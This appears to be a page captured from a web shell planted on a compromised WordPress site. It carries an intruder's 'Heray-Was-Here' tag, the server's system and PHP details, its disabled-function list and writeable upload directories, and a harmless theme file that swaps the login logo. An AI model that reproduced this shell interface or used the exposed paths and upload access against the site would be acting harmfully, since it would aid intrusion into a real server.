Heray-Was-Here
Server : Apache
System : FreeBSD soch.intera5.net 12.4-RELEASE-p6 FreeBSD 12.4-RELEASE-p6 GENERIC i386
User : www ( 80)
PHP Version : 7.4.30
Disable Function : getallheaders,exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,parse_ini_file,show_source,phpinfo
Directory :  /soch/wwwroot/saboyaguinea.es/saboyaguinea.es/wp-content/themes/Divi-child/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /soch/wwwroot/saboyaguinea.es/saboyaguinea.es/wp-content/themes/Divi-child/functions.php
<?php
//Cambiamos el logo
add_action( 'login_enqueue_scripts', 'bs_change_login_logo' );
function bs_change_login_logo() { ?> 

<style type="text/css"> 
  
#login h1 a {
background-image: url('http://www.saboyaguinea.es/wp-content/uploads/2020/02/logo-SG-80x80-1.png');
} 
					  
</style>
					
<?php }

//Cambiamos la URL del logo			  
add_filter( 'login_headerurl', 'bs_login_logo_url' );
function bs_login_logo_url($url) {
    return 'http://www.saboyaguinea.es/';}

Hry